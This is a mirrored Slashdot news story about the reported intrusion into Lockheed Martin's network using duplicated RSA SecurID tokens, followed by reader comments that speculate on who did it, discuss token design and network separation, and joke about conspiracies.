Slashdot Mirror

← Back to Stories (view on slashdot.org)

Duplicate RSA Keys Enable Lockheed Martin Network Intrusion

Posted by timothy on from the nobody's-perfect dept.

An anonymous reader writes "Unknown hackers have broken into the security networks of Lockheed Martin Corp and several other US military contractors, a source with direct knowledge of the attacks told Reuters. They breached security systems designed to keep out intruders by creating duplicates to 'SecurID' electronic keys from EMC Corp's RSA security division, said the person who was not authorized to publicly discuss the matter." There's also coverage at PC Magazine.

138 comments

  1. The Security Dance by Frosty+Piss · · Score: 3, Interesting

    â¦said the person who was not authorized to publicly discuss the matter

    I love it how these companies and even our own government can't keep people from talking about secrets, like it's so fucking juicy that everyone just has to spill it out to the press.

    Yes, I'm not a moron, I know these "not authorized" folks are probably explicitly authorized... It's just the whole security "dance" is so fucking silly.

    --
    If you want news from today, you have to come back tomorrow.
    1. Re:The Security Dance by maxwell+demon · · Score: 1

      â¦said the person who was not authorized to publicly discuss the matter

      I love it how these companies and even our own government can't keep people from talking about secrets, like it's so fucking juicy that everyone just has to spill it out to the press.

      Yes, I'm not a moron, I know these "not authorized" folks are probably explicitly authorized... It's just the whole security "dance" is so fucking silly.

      Except if it's a conspiracy, of course. Everyone knows that the government manages to keep its conspiracies completely secret.

      --
      The Tao of math: The numbers you can count are not the real numbers.
    2. Re:The Security Dance by __aaqvdr516 · · Score: 2

      The usual way that press inquiries are handled is to have all personnel direct any inquiries to the PR officer or group. It is usually someone who has no real knowledge of what happened and only gives scripted responses to inquiries.

      Since they have real information on how the breach occured, I'd bet it really was someone who was unauthorized to speak spilling the beans.

    3. Re:The Security Dance by Xtifr · · Score: 1

      I love it how these companies and even our own government can't keep people from talking about secrets

      Sure they can! It's just that they're only good at it when it concerns UFOs and JFK's assassination and Bigfoots and the faked moon landing and the Illuminati and the herds of Invisible Pink Unicorns thundering across the Great Plains, and things like that.

    4. Re:The Security Dance by yuhong · · Score: 1

      Yea, legacy PR based on control of the message is fundamentally flawed.

    5. Re:The Security Dance by OpenLegs · · Score: 2

      Agreed, more FUD to support renewal of the Patriot Act.

    6. Re:The Security Dance by erroneus · · Score: 2

      Not necessarily. I seem to recall about a month or two ago a story came out about a serious compromise in RSA's systems which was said had potential to compromise most, if not all, SecureID devices out there.

      I recall when this story came out, I asked "Should we be concerned about this?" We use SecureIDs to get into the company network...

    7. Re:The Security Dance by Anonymous Coward · · Score: 0

      Uuum, look at all the conspiracy theory websites! Apparently, they can't keep anything secret.
      It's just that for conspiracies, they don't even have to. Since nobody would believe it anyway.
      .
      .
      Which gives me an idea for the perfect crime... ;)

    8. Re:The Security Dance by Jah-Wren+Ryel · · Score: 1

      Since they have real information on how the breach occured, I'd bet it really was someone who was unauthorized to speak spilling the beans.

      That's the way it works for most businesses, but not the way it works for government agencies.

      As Lockmart is the largest corporate member of the military industrial complex, things are little bit different in this case. There are national security implications to both lockheed being hacked and to RSA tokens being duplicable. That makes for all kinds of motives for a "controlled" leak like this, for all we know it is 100% spin designed to cover some other worse(?) scenario.

      --
      When information is power, privacy is freedom.
    9. Re:The Security Dance by _Sprocket_ · · Score: 1

      That's the way it works for most businesses, but not the way it works for government agencies.

      As Lockmart is the largest corporate member of the military industrial complex, things are little bit different in this case. There are national security implications to both lockheed being hacked and to RSA tokens being duplicable. That makes for all kinds of motives for a "controlled" leak like this, for all we know it is 100% spin designed to cover some other worse(?) scenario.

      Ahhh - the language of conspiracy. We know we're in for some really good non-information as soon as "Lockmart" and "military industrial complex" are uttered. Yes - serious implications for Lockheed's compromise (psst - not the first time). Serious implications for RSA tokens being duplicated - definitely. Then we'll just play "I've got a secret" and end it with vague mention of "all kinds" of spin and unnamed scenarios. That should be enough to get lots of head-nodding from the anti-military political crowd and other conspiracy theorists.

    10. Re:The Security Dance by _Sprocket_ · · Score: 2

      Not necessarily. I seem to recall about a month or two ago a story came out about a serious compromise in RSA's systems which was said had potential to compromise most, if not all, SecureID devices out there.

      Potential - yes. In so far RSA wasn't really being too frank about what was involved. So since the compromised involved the SecurID product in some way, who's to know exactly what's going on? The potential is there.

      I recall when this story came out, I asked "Should we be concerned about this?" We use SecureIDs to get into the company network...

      To which RSA assured everyone that they should be following "best practices" and maybe paying a lot more attention to failed authentication attempts. Yeah - thanks.

      The possible implication here is that RSA has been far, far less forthcoming than they should have been about this incident. Which has me wondering if we really should be trusting their product in our own environment.

    11. Re:The Security Dance by PPH · · Score: 1

      Those websites are all manufactured and contain false information. To keep you from looking in the right places.

      The proof that there is a secret conspiracy is that we have no evidence of it. Now excuse my while I polish my tinfoil hat.

      --
      Have gnu, will travel.
    12. Re:The Security Dance by Yvan256 · · Score: 1

      You fool! The more you polish it, the more it reverses the polarity!

    13. Re:The Security Dance by milkmage · · Score: 1

      WTF Patriot Act? Hacking was illegal prior to 9/11

    14. Re:The Security Dance by Runaway1956 · · Score: 0

      If hacking were illegal, then some pretty famous people would still be locked up. Bill Gates, Steve Jobs, and Linus Torvalds come readily to mind. Microsoft employees by the hundreds. Apple employees by the score. Probably all of the anti-malware companies would lose their most valuable people.

      Had you said that "espionage" and "theft by wire" were illegal bfore 9/11, your post would have made more sense. "Hacking" is not, nor has it ever been illegal - TOS's and EULA's notwithstanding.

      --
      "Windows is like the faint smell of piss in a subway: it's there, and there's nothing you can do about it." - Charlie Br
    15. Re:The Security Dance by Anonymous Coward · · Score: 0

      Pedantry and willful ignorance. I'm quite sure you knew the parent meant "hacking" as in breaking into remote computer systems to access sensitive information, i.e. computer fraud. Yet you choose to ignore the reasonable meaning of the term in context in strict adherence to the hobbyist term, just to make an irrelevant point.

      Sad thing is these kind of pointless ripostes are the quickest ones to get modded up around here.

    16. Re:The Security Dance by Jah-Wren+Ryel · · Score: 1

      WTF? Everything I wrote is pretty much self-evident.

      Getting their unclass network breached is a freaking obvious problem.

      It is no secret that the military uses RSA tokens all over the place either. It is also no secret that RSA guards the source code at the heart of their authentication system pretty jealousy - not even including it in their SDK. And the idea that RSA tokens may now be duplicable due to the prior theft of that source was in the goddamn HEADLINE of the story here.

      On the nature of the unauthorized source actually being deliberate - the government does that all the time.

      As for the term "Lockmart" - everybody else in the industry and even some of their own employees use it, the ones who like to tweak the others that have a stick up their ass about it.

      --
      When information is power, privacy is freedom.
    17. Re:The Security Dance by Anonymous Coward · · Score: 0

      Why in the hell didn't RSA fixed the problem and regenerate keys and replace all the devices? If they're so hindbound they did not have an improved product waiting and so arthritic they could not get this manufactured and distributed by now they don't need to be in business.

      The last time I handled classified data it was never allowed on any non-NSA approved computer that had a wire leaving the building be it network, phone that did not have an NSA approved encryption device.

      This does not count for either deliberate action or human error in transferring classified material to a forbidden system but employees are usually well trained and informed of the consequences.

    18. Re:The Security Dance by melikamp · · Score: 1

      I thought you are just talking out of your ass, but then I read your nick... and dude, wow. How could we be so blind? Preach on, brother.

    19. Re:The Security Dance by JD770 · · Score: 0

      Like the "demotivational" poster says: If you're not part of the solution, there's good money to be made in prolonging the problem.

    20. Re:The Security Dance by Anonymous Coward · · Score: 0

      I read it as though they are pissed they got compromised, and they want to hang this squarely on RSA but you can't do that in a press conference. So they have someone in the know drop the story out there.

    21. Re:The Security Dance by Sulphur · · Score: 1

      You fool! The more you polish it, the more it reverses the polarity!

      That is Al hats, not genuine Sn hats.

    22. Re:The Security Dance by _Sprocket_ · · Score: 1

      WTF? Everything I wrote is pretty much self-evident.

      Getting their unclass network breached is a freaking obvious problem.

      Well, yes. Everything is pretty much self-evident except for the part that goes:

      That makes for all kinds of motives for a "controlled" leak like this, for all we know it is 100% spin designed to cover some other worse(?) scenario.

      What's the motive for a controlled leak? What possible worse case scenarios. If you're going to invoke conspiracy, at least entertain us with one.

      It is no secret that the military uses RSA tokens all over the place either. It is also no secret that RSA guards the source code at the heart of their authentication system pretty jealousy - not even including it in their SDK. And the idea that RSA tokens may now be duplicable due to the prior theft of that source was in the goddamn HEADLINE of the story here.

      I agree for the most part. Although the big question is exactly what RSA's intrusion meant. We don't know how this intrusion endangered the SecurID product line. And that's the rub. IMHO, a security company shouldn't be leaving questions about their products like that unanswered.

    23. Re:The Security Dance by Jah-Wren+Ryel · · Score: 1

      What's the motive for a controlled leak? What possible worse case scenarios. If you're going to invoke conspiracy, at least entertain us with one.

      If RSA isn't at fault but everyone thinks they are then there then that does a lot of things. Like political cover for Lockheed management doing something stupid that actually enabled the breach - say poor protection against spear-phising attacks. Or security through misdirection - maybe the real vulnerability is present in other systems and they are hoping that other bad guys won't figure it out in time to take advantage of it if everybody thinks RSA is compromised instead.

      --
      When information is power, privacy is freedom.
  2. Uplink by Jasoman · · Score: 1

    All these security breaches reminds me of the game Uplink.

    1. Re:Uplink by Opportunist · · Score: 1

      Every time I played it I found it hilarious that I could time and again hack the same "high security" servers with the same approach, every time resulting in a story about a "yet again" security breach at some important database, and I was sitting there snickering, thinking something like this would just be unthinkable in reality since they'd of course analyze how I got in and seal that security hole.

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    2. Re:Uplink by sortius_nod · · Score: 1

      thinking something like this would just be unthinkable in reality since they'd of course analyze how I got in and seal that security hole.

      Yeh, that's a nice fantasy. Unfortunately that's not how things go. Look at Sony, they still haven't fixed their security problems and it's been over a month.

    3. Re:Uplink by WrongSizeGlass · · Score: 1

      All these security breaches reminds me of the game Uplink.

      All these security breaches remind me that the world has changed in an irrevocable manner and that it's only a matter of time before anything and everything falls victim to these types of attacks. Nothing is really safe anymore.

    4. Re:Uplink by Blackbrain · · Score: 1

      All these security breaches remind me that the world has changed in an irrevocable manner and that it's only a matter of time before anything and everything falls victim to these types of attacks. Nothing is really safe anymore.

      Nothing ever was. The only difference now is that this one made the news.

      --
      Where would we be if Wheel had hid her round rock in a cave instead of showing everyone how it rolls?
    5. Re:Uplink by TapeCutter · · Score: 1

      So you're saying the sony network is back up and anyone can use the same hole?

      --
      And did you exchange a walk on part in the war for a lead role in a cage? - Pink Floyd.
    6. Re:Uplink by Tridus · · Score: 1

      If they really got in by duplicating an RSA token, sealing the hole requires figuring out how they managed to do that. Not as simple as it sounds.

      --
      -- "So they told me that using the download page to download something was not something they anticipated." - Bill Gates
    7. Re:Uplink by Runaway1956 · · Score: 0

      All this time, I've been thinking that Sony IS the security problem. Visa, Mastercard, and Bank of America didn't leak all those user's credentials - Sony did. Sony doesn't "have" security problems, they are the problem!

      --
      "Windows is like the faint smell of piss in a subway: it's there, and there's nothing you can do about it." - Charlie Br
    8. Re:Uplink by Anonymous Coward · · Score: 0

      All you need to duplicate an RSA token is a list of all secrets, the algorithm to generate the answers from the secrets, and you need to observe enough authentications to disambiguate that token's secret from your list of secrets. And enough CPU or time to calculate responses to all secrets for the first observed authentication.

      Not easy, but possible if you've got the list of secrets.

    9. Re:Uplink by milkmage · · Score: 1

      "something like this would just be unthinkable in reality since they'd of course analyze how I got in and seal that security hole"

      putting the cap back on the toothpaste prevents more from coming out, but it doesn't clean up the mess on the counter.

  3. Aha! by wiedzmin · · Score: 2

    So this is what they hacked RSA for! I was waiting to find out who the end-target was... makes sense.

    --
    Bow before me, for I am root.
    1. Re:Aha! by slartibartfastatp · · Score: 1

      I bet they used the d-wave they just bought.

      --
      -- --
    2. Re:Aha! by fuzzyfuzzyfungus · · Score: 3, Funny

      I, for one, am shocked, shocked, that RSA's assertion that the breach was minor and totally, not, y'know, a real world issue was less than 100% truthful...

    3. Re:Aha! by GameboyRMH · · Score: 1

      They chose an excellent target, imagine the technological goodies you'd find at Lockheed Martin, a company elbow-deep in every corner of the US military's black projects, the company that built the A-12, basically a slightly smaller and slightly less refined SR-71, in the '50s. Imagine what they're doing today.

      --
      "When information is power, privacy is freedom" - Jah-Wren Ryel
    4. Re:Aha! by markkezner · · Score: 1

      Although it's possible that Lockheed was the end target of the RSA crackers, it's also possible that the fruits of the RSA hack were simply sold to the people who then used it to do the Lockheed break in.

      --
      Dangerous, sexy, turing complete: Femme Bots
    5. Re:Aha! by TheLink · · Score: 1

      Maybe it'll be another Brit who claims to be looking for UFOs or aliens...

      --
    6. Re:Aha! by Stupendoussteve · · Score: 1

      The company that built the A-12 also built the SR-71, U-2, F-22, F-35 and who knows what else.

  4. Mmm... by Oxford_Comma_Lover · · Score: 1

    China, Iran, India, or someone planning to sell it (Russia, Organized Crime, etc...)?

    I suppose Israel could do it too. (They'd risk a bit if they got caught, but we know they have the capability.)

    --
    -- IANAL, this isn't legal advice, and definitely isn't legal advice for you. Also, Squee!
    1. Re:Mmm... by Frosty+Piss · · Score: 1

      China, Iran, India, or someone planning to sell it (Russia, Organized Crime, etc...)?

      China has the most to gain.

      --
      If you want news from today, you have to come back tomorrow.
    2. Re:Mmm... by Angostura · · Score: 1

      So you're excluding Boeing?

    3. Re:Mmm... by WrongSizeGlass · · Score: 1, Troll

      So you're excluding Boeing?

      Let's not exclude the US government either. Nothing points the finger elsewhere like attacking one of your own major contractors. The NSA, CIA, etc aren't above stealing the RSA keys. /tinfoilhat

    4. Re:Mmm... by Anonymous Coward · · Score: 0

      Any thief gains if they can find a buyer for their stolen goods. Certainly there is more than one country or one non-state actor in the world who would want valuable US defense contractor data just to sell to other interested buyers across the globe. Even another US defense contractor competitor may be responsible. I'm not sure why China is always thought to be the culprit unless this is some attempt to trying to drum up a new "Red Scare".

    5. Re:Mmm... by Anonymous Coward · · Score: 0

      Why would Israel do it? If they wanted advanced military hardware from the USA, all they have to do is ask. It's not like the USA hasn't already given them pretty much the same hardware which the USAF/marines/army/etc already use (and the plans so they can build them themselves)...

    6. Re:Mmm... by Anonymous Coward · · Score: 0

      Getting the hardware is not like getting the hardware and the construction plans. Even if you don't have plan to steal the design. You might want to know if the hardware has backdoors and how to defeat them. You might want to service them without needing external parties. Total ownership is important, we're talking about arms, not PS3 or windows PCs.

      Having said that, if Israel could get nuke technology from the west, it probably has enough ties to get all the rest without needing to break into systems.

    7. Re:Mmm... by Dasher42 · · Score: 1

      It was the Cylons.

  5. Spoken like a true spokesperson... by Zakabog · · Score: 4, Insightful

    and we remain confident in the integrity of our robust, multi-layered information systems security

    Translation: Our system's breached but maybe you won't realize that if I throw enough buzz words at you...

    1. Re:Spoken like a true spokesperson... by betterunixthanunix · · Score: 4, Insightful

      On the other hand, a robust security system should be able to keep your most important information secure even when a breach occurs at lower levels. So, perhaps a breach occurred that allows some expense reports to be copied but does not enable the attackers to obtain designs for stealth aircraft. A breach is not a good thing, but it does not have to be an all-or-nothing scenario.

      --
      Palm trees and 8
    2. Re:Spoken like a true spokesperson... by Frosty+Piss · · Score: 1

      It might have been "multi-layered", but clearly was not "robust".

      --
      If you want news from today, you have to come back tomorrow.
    3. Re:Spoken like a true spokesperson... by Anonymous Coward · · Score: 0

      On the other hand, a robust security system should be able to keep your most important information secure even when a breach occurs at lower levels. So, perhaps a breach occurred that allows some expense reports to be copied but does not enable the attackers to obtain designs for stealth aircraft. A breach is not a good thing, but it does not have to be an all-or-nothing scenario.

      Indeed. At the defense contractor where I worked, all computers with classified documents were kept isolated in a locked room with no internet connection. The room was also guarded by a guy who knew by sight everyone who had access. They also prevented anyone from bringing in USB drives and the like.

    4. Re:Spoken like a true spokesperson... by Doctor_Jest · · Score: 1

      Usually I just chalk this up to the morons they hire in the admin departments... but suffice to say, the worst the breach could've gotten, even from a Defense Contractor, is trade secrets... and possibly some unclassified designs and whatnot. (Classified systems are not facing the internet. Ever.) And of course a huge PR hit to Lockheed Martin's ability to claim they can keep anything "secret." :)

      They also might've gotten some foreign contract information... depending upon how far they snooped. :) It depends... some foreign entities prefer the same security the US DoD has.. (more or less. heh.)

       

      --
      It's the Stay-Puft Marshmallow Man.
    5. Re:Spoken like a true spokesperson... by Jah-Wren+Ryel · · Score: 2

      Indeed. At the defense contractor where I worked, all computers with classified documents were kept isolated in a locked room with no internet connection.

      However, that is not necessarily the case for information that individually is unclassified but in aggregate is classified. The government security folks have a name for that stuff, I just can't recall it at the moment. If an attacker were able to hoover up enough stuff from lockmart's unclassified networks it would be valuable intelligence to the government of some place like China or Israel.

      --
      When information is power, privacy is freedom.
    6. Re:Spoken like a true spokesperson... by Anonymous Coward · · Score: 0

      "Translation: Our system's breached but maybe you won't realize that if I throw enough buzz words at you..."

      Further translation: We just passed the bill extending the patriot act for 4 more years. We have to "create" some press about why it was necessary to against our campaign promises.

    7. Re:Spoken like a true spokesperson... by AmiMoJo · · Score: 1

      Problem is that once your attacker has the private key they can impersonate the server and/or perform man-in-the-middle attacks. That could get them passwords and keys for everything else because things like SSH and RDP rely on the connection being secure enough to send raw key presses as the user logs in etc. Loss of private keys is pretty serious.

      --
      const int one = 65536; (Silvermoon, Texture.cs)
      SJW, n: "Someone I don't like, and by the way I'm a fuckwit" - AC
    8. Re:Spoken like a true spokesperson... by Anonymous Coward · · Score: 1

      Disclaimer: I work for Boeing in Information Security.

      Todd Kelley is communications and not incident detection and response. He most likely has no clue on the state of the network and probably did not have time to contact someone and find out when he gave that statement.

      That said, we do not rely on RSA SecurID's. As soon as the initial breach of RSA was reported, any SecurID's in use were basically force retired.

    9. Re:Spoken like a true spokesperson... by betterunixthanunix · · Score: 1

      Assuming you only have one key for all security levels, which would be a pretty bad idea.

      --
      Palm trees and 8
    10. Re:Spoken like a true spokesperson... by the_B0fh · · Score: 1

      you forget one thing. Typically RSA tokens are used for the high value shit, the hardest to get to, most protected shit.

      so, this is RSA token being duplicated. Guess what. Major fault.

    11. Re:Spoken like a true spokesperson... by Rich0 · · Score: 1

      I still have no idea why RSA of all places would implement their tokens in this manner. If they just used an asymmetric cipher (like RSA!) it would be immune to this kind of attack.

      There is no reason that any device other than the keyfob itself needs to be able to generate the numbers. Other devices merely need to authenticate if a number is correct - which can be done separately just as with any other asymetric system.

      However, I do see a weakness in this - the PINs that are generated need to be much longer, or the system has to be so heavily salted that it takes a very long time to verify a single PIN. With a six-digit PIN you just need to ask "Is 000001 the right PIN for 5:30:00PM tomorrow?" and repeat a million times until you can generate a PIN for any arbitrary time using only the authentication checking info. You can't do that with any sane system because the challenge/response is MUCH longer. VERY heavy salting would also work, but you probably don't want it to take 20 minutes of 100% CPU to verify a PIN on some loaded server.

    12. Re:Spoken like a true spokesperson... by betterunixthanunix · · Score: 1

      Really? The last time I was issued one of those, I was not in a very high level position; I was just an intern on a development team. My access was limited; I had some access to business documents (mainly from company mailing lists), but I could not access all systems, particularly not the high security systems.

      --
      Palm trees and 8
    13. Re:Spoken like a true spokesperson... by StickyWidget · · Score: 1
      Multiple keys wouldn't have helped, since it appears the attackers identified all the seeds that were ordered by Lockheed from RSA. Whatever process they used to assign these seeds to unique individuals would have been robust enough to notice that the individual was using two.

      It was endgame. Everyone should have trashed all their tokens weeks ago.

      ~Sticky

    14. Re:Spoken like a true spokesperson... by ShnowDoggie · · Score: 1

      Remember when the Presidential helicopters were redesigned to be better a few years ago? The security there failed and the plans were released on the Internet. Never say never!

    15. Re:Spoken like a true spokesperson... by Anonymous Coward · · Score: 0

      You're missing the point---the important stuff isn't on the same network. It's on its own network, physically separated from any internal network, and in a tightly controlled and secure room, floor, or building. The keys are worthless.

      Yes, in a company that size, random data will leak through. Some of it will be proprietary data, sensitive, or personal info. However, you can be pretty sure it's not classified, never mind top secret, and certainly not black.

      These people aren't idiots. They spend most of their lives in secure rooms, they often can't tell anyone, even their coworkers, what they're doing, they work crazy hours, nearly all of them have advanced, highly specialized and technical engineering degrees, they're all cleared for top secret, and most things that they're doing involve constant security checks for even routine tasks.

      So. Yeah. Sure, shit happens, but, believe me, we've thought of these things.

      -guy who works in the industry

    16. Re:Spoken like a true spokesperson... by Anonymous Coward · · Score: 0

      This is in fact exactly correct. The article even states

      Defense contractors' networks contain sensitive data on sophisticated weapons systems, but all classified information is kept on separate, closed networks managed by the U.S. government

      I work first hand with security systems like this and even computers that store information classified as SECRET are not on the same physical network as computers that contain information classified as TOP SECRET. It only makes sense. Those hackers compromised the networks but I'm certain they didn't get anything classified from their attack.

    17. Re:Spoken like a true spokesperson... by Fallen+Kell · · Score: 3, Insightful

      For anyone working at a place like this, they know that the real data is on a separate network which has no physical connection to the internet. The only data that could possibly have been compromised would be unclassified, business trade secrets, and/or proprietary information.

      As the one official said (which was almost completely ignored by the article's authors), there should be little risk to actual projects. Really, what they got was access to "TPS reports", and other such documents. Now, there may be an issue with "Export Control" as even if some documents are unclassified, they may not be allowed to be transmitted to certain countries. But all the real information is on that other network which you need physical access to hack, which is one of the easiest things to secure.

      --
      We were all warned a long time ago that MS products sucked, remember the Magic 8 Ball said, "Outlook not so good"
    18. Re:Spoken like a true spokesperson... by EETech1 · · Score: 1

      Lockheed Martin confirms attack on its IT network
        (AFP)
      â"
      1 hour ago
      WASHINGTON â" US defense contractor Lockheed Martin has confirmed that it had detected "a significant and tenacious" attack on its information systems network.
      "Lockheed Martin detected a significant and tenacious attack on its information systems network," said a company statement.
      The company's information security team detected the attack almost immediately and took what is described as "aggressive actions" to protect all systems and data, the statement added.
      "As a result of the swift and deliberate actions taken to protect the network and increase IT security, our systems remain secure," Lockheed Martin said.
      "No customer, program or employee personal data has been compromised."
      The incident was under investigation, and Lockheed Martin said it was keeping appropriate US government agencies informed of situation. It did not mention any suspected source of the cyber-attack.
      The company said that despite the attack, it remained confident in the integrity of its "robust, multi-layered information systems security."

    19. Re:Spoken like a true spokesperson... by schnell · · Score: 1

      Typically RSA tokens are used for the high value shit, the hardest to get to, most protected shit.

      In parts of the corporate world? Maybe. (Debatable though since my company uses RSA tokens and every Joe Sixpack with a laptop has one.)

      In the US government? Not a chance. Information whose unauthorized release poses a threat to national security is "classified" and access restricted to networks which are 1.) logically airgapped from public networks and 2.) wouldn't let a RSA token get within spitting distance. This applies for defense contractors too... if it was a publicly accessible network they got into via spoofed RSA tokens, I can guarantee you it did them no good for getting the real juicy stuff unless Northrop Grumman seriously botched their Information Assurance architecture. And screwing that up doesn't result in bad press, it results in people wearing orange jumpsuits in Fort Leavenworth.

      --
      "95% of all Slashdot .sig quotes are incorrect or completely fabricated." -Benjamin Franklin
    20. Re:Spoken like a true spokesperson... by Anonymous Coward · · Score: 0

      If people do follow routines. They do not follow routines. Have a look at all the illegal private pictures of seemingly illegal activities from the current major war zones.

      The soldiers are not allowed to do this so they do it on regular basis. Trust people to do what ever is convenient. Often putting them self in risk for doing it.

    21. Re:Spoken like a true spokesperson... by Anonymous Coward · · Score: 0

      If they just used an asymmetric cipher (like RSA!) it would be immune to this kind of attack.

      The RSA algorithm uses lots of energy. A small lithium button cell would not last the required 500,000+ update cycles.

      The RSA algorithm is also more susceptible to side channel attacks (due to the variable-length computations). Algorithms that use fixed-width data are easier to secure.

    22. Re:Spoken like a true spokesperson... by hey! · · Score: 1

      Except the spokesman, whether or not he is speaking truthfully, is describing the way things *should* be. Policies and procedures should not be built around the assumption that everything *works*. They should assume that at any given time something or things might not be working.

      Anyone familiar with MySQL's permissions systems knows that one of the niftier things about it is that you can differentiate between the rights you give a user depending on the IP address or network his session originates from. You may only allow certain things to be done (typically administrative things) if the user is physically working on a specific machine (typically the server host). Of course it's up to you to think through whether you should allow ssh access to that machine. But this is an example of the philosophy I'm talking about. You don't assume that credentials (e.g., user name and password) can be relied upon without fail. You assume they're going to fail, and make the tradeoff between convenience (authorizing everything based on credentials alone) and security (only allowing admins to log in from the physical server) accordingly.

      --
      Post may contain irony: discontinue use if experiencing mood swings, nausea or elevated blood pressure.
    23. Re:Spoken like a true spokesperson... by Anonymous Coward · · Score: 0

      All well and good, but that doesn't mean they didn't want TPS reports in the first place.

    24. Re:Spoken like a true spokesperson... by Doctor_Jest · · Score: 1

      The presidential helicopters themselves aren't the problem. the Avionics and electronic warfare stuff inside is what really counted, and that wasn't leaked. There were several foreign contractors involved in that as well... sort of like the unclassified portions of the F-35 being siphoned off by a subcontractor out of Turkey (I believe.)

      I am not saying it's never going to happen. It just takes more than this to get to it. There is no way to get it via the internet. There is no classified anything connected to the internet... if there is, someone's head will (literally) roll. :)

      --
      It's the Stay-Puft Marshmallow Man.
  6. Does RSA store usernames and pins? by solarium_rider · · Score: 3, Insightful

    Can someone explain what was actually stolen from RSA that allowed them to break into the networks? From what I understand even if you had had a duplicate SecurID number generator, you would still need the username and securid password (fixed code + random 6 digit) associated with the account to get into the network. Once you are into the network you probably also need a username (same as above) and user password to access the machines. This sounds more like the attackers must have had significant insider knowledge to get in.

    --
    -- How many sigs are as useless as this one?
    1. Re:Does RSA store usernames and pins? by Dunbal · · Score: 1

      Well see the people used the same password at work as they used for PSN...

      --
      Seven puppies were harmed during the making of this post.
    2. Re:Does RSA store usernames and pins? by betterunixthanunix · · Score: 1

      I think they found a way to synchronize their copied SecurID tokens with the victims', thus reducing the attack to figuring out the victim's password.

      --
      Palm trees and 8
    3. Re:Does RSA store usernames and pins? by Spad · · Score: 2

      Usernames and passwords are trivial to socially engineer; most people you ask will give you their password without you even asking for it if you claim to be "from IT".

    4. Re:Does RSA store usernames and pins? by Professor_UNIX · · Score: 1

      Exactly. Even if the seed files for the token were stolen, RSA still has no information about what seed file information was associated with what user! A company like Lockheed Martin could have tens of thousands of Securid tokens. The permutations for users to tokens to guessing PINs is still astronomical unless an insider was involved that had access to the securid database.

    5. Re:Does RSA store usernames and pins? by Yaur · · Score: 1

      Not that far fetched TBH.

    6. Re:Does RSA store usernames and pins? by blincoln · · Score: 2

      "The permutations for users to tokens to guessing PINs is still astronomical unless an insider was involved that had access to the securid database."

      Maybe. But if you think about it, there are approaches that would only require a lot of attempts, not an "astronomical" number. If you know the username of an employee and whatever Lockheed-Martin's helpdesk uses for verification (last four SSN digits or whatever), you can have their password and SecurID PIN reset. Then just try that PIN with every cloned token in your possession. Trying different PINs with the same token will cause a lockout, but will trying each token once with the same PIN? I'm pretty sure that would go unnoticed, especially if the attempts were made from different proxy servers to mask the source IP all being the same.

      It could also be that RSA had network captures or SecurID database backups or something along those lines *from* Lockheed-Martin that were sent in for troubleshooting purposes, and *those* were stolen as well.

      --
      "...always new atoms but always doing the same dance, remembering what the dance was yesterday." -Richard Feynman
    7. Re:Does RSA store usernames and pins? by rahvin112 · · Score: 2

      Some of the early places that jumped on the securID tokens only used the securID as the password (in other words there was no password in front of the 6 digit random code), thus it was trivial to compromise if you could compromise the RSA securID system. What I don't get is why these organizations didn't immediately upgrade security when word came down the the root compromise of RSA. Like one of the previous posters I always believed that breaking the securID system was a deliberate and planned attack to gain access to secondary systems that used the tokens, it's only a question of who did it because one party is responsible for both.

    8. Re:Does RSA store usernames and pins? by _Sprocket_ · · Score: 1

      Trying different PINs with the same token will cause a lockout, but will trying each token once with the same PIN? I'm pretty sure that would go unnoticed, especially if the attempts were made from different proxy servers to mask the source IP all being the same.

      A combination of PIN and Token Code act like a password. A bad auth attempt is a bad auth attempt no matter whether you used the wrong PIN or gave the wrong Token Code (although the SecurID system will log when its noticed a correct token code and bad PIN or when the user might have transposed PIN and token code). So it doesn't much matter whether you're brute-forcing the token or the PIN - both will generate failed auth attempts and eventually bump up against any account lockout mechanism (which should be in place according to FISMA requirements).

    9. Re:Does RSA store usernames and pins? by ebonum · · Score: 1

      two words:
      keystroke logger

    10. Re:Does RSA store usernames and pins? by Anonymous Coward · · Score: 0

      Yes every SecurID has a serial number on the back to match up with the seed file (to allocated it out of the box to the user).

      There maybe other ways to get a current valid pin from the real token at a specific point in time. Hey if they can see if visually that will do.

      Then I guess the copied token is just wound forwards/backwards in time index until that number is found.

      So then you are just left with the something you know aspect to manage, but I hear electrodes on the scrotum can assist in that convern. Or yes just a plan old keyboard logger, but I would hope a facility that handles classified material doesn't have a regular keyboard that can be just unplugged without the alarms going off.

      So then need to make "the something you have" part more secure, by not having a serial number or visual access to the PIN on display at all / any time. Hmm I think that is called a smart card.

  7. Need some new words by Garble+Snarky · · Score: 1

    I think we need new English words to represent these concepts more concisely: an adjective for "not authorized to speak publicly on the matter", and a verb for "confirmed under condition of anonymity".

    1. Re:Need some new words by amolapacificapaloma · · Score: 1

      she = "not authorized to speak publicly on the matter"

      said = "confirmed under condition of anonymity".

      Like in... that's what she said!

      --
      exp(i*pi)+1=0
    2. Re:Need some new words by erroneus · · Score: 1

      Why? "Natspot'm" and "cucoa" are perfectly pronouncible acronyms!

  8. Quantum by SilverHatHacker · · Score: 0

    Wonder what relation, if any, this has to the quantum computer?

    --
    Funny may not give karma, but +5 Informative never made anyone snort coffee out their nose.
    1. Re:Quantum by betterunixthanunix · · Score: 1

      Probably none, since that computer only allows for a limited form of quantum computing (which, as far as I know, is not useful for factoring RSA numbers or solving the discrete logarithm problem or much that is likely to be of interest to the attackers). My guess is that the attackers were interested in Lockheed's software or weapons designs.

      --
      Palm trees and 8
    2. Re:Quantum by VortexCortex · · Score: 4, Funny

      Wonder what relation, if any, this has to the quantum computer?

      My guess is that their new quantum computer enables their security to exists as a super position of itself -- both being very secure, and completely unsecured at the same time.

      However, now that the state of their security has been observed, it has collapsed into only one state (which is unfortunately: unsecured).

    3. Re:Quantum by semi-extrinsic · · Score: 1

      Well, given that Lockheed announced three days ago that they had "agreed to buy it", implying that they won't have it for several months (and it may not even physically exist yet), I'd say nada.

      --
      for i in `facebook friends "=bday" 2>/dev/null | cut -d " " -f 3-`; do facebook wallpost $i "Happy birthday!"; done
  9. Hey, maybe we can finally ask by 50000BTU_barbecue · · Score: 1

    ... Lockheed what the true top speed of the SR-71 was?

    --
    Mostly random stuff.
    1. Re:Hey, maybe we can finally ask by Announcer · · Score: 1

      Now that it's been hacked, it should be online soon, and you can Google it.

      --
      Willie...
    2. Re:Hey, maybe we can finally ask by Sentry23 · · Score: 0

      Funny story. Top speed of the SR-71B turns out to be exactly half the top speed of the TR-3B.

    3. Re:Hey, maybe we can finally ask by rrossman2 · · Score: 1

      Wow.. if you mean the Triumph then I guess the SR-71 was a lot slower than we had all guessed!

